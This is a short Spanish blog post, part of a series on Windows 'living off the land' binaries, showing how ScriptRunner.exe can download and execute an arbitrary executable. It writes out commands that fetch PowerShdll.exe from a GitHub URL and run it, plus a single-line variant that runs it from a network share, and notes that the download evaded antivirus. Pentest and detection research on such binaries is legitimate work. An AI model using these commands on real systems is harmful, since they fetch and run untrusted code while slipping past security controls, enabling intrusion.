3 abr 2020

Explotando LOLBins en sistemas Windows. Parte 3

Buenas a todos, continuando la cadena sobre LOLBins de Windows, hoy quería hablaros de "ScriptRunner.exe", un binario incluído en Windows 10 y en versiones anteriores, que podremos utilizar con la doble funcionalidad de descargar y ejecutar, un potencial ejecutable malicioso.

Este lolbin lo podréis encontrar en el proyecto LOLBAS, sobre el que os hablamos brevemente en anteriores posts de esta cadena:

En el ejemplo que hoy veremos, voy a continuar utilizando las DLLs y EXEs subidas por P3nt4 a su repositorio, al cual podréis acceder desde el siguiente enlace: 

Para descargar el powershell de hoy, utilizaremos "scriptrunner" con el parámetro "appvscript", indicando la URL donde se encuentra el exe:
scriptrunner -appvscript https://github.com/p3nt4/PowerShdll/raw/master/exe/bin/Release/Powershdll.exe



Se descargará el exe como si hubieseis accedido directamente desde el navegador. En mi caso, ha pasado desapercibido para el AV.

Y una vez descargado, podremos ejecutarlo del mismo modo:
scriptrunner -appvscript Powershdll.exe




Si el ejecutable malicioso lo tuviésemos accesible en red, o en un pendrive, podríamos realizarlo con una única instrucción:
scriptrunner -appvscript "\\fluserver\Powershdll.exe"

Como veis, con el mismo resultado:


Así que ya tenéis otro lolbin para añadir a vuestro repositorio de pentest :)

Saludos!

No hay comentarios:

Publicar un comentario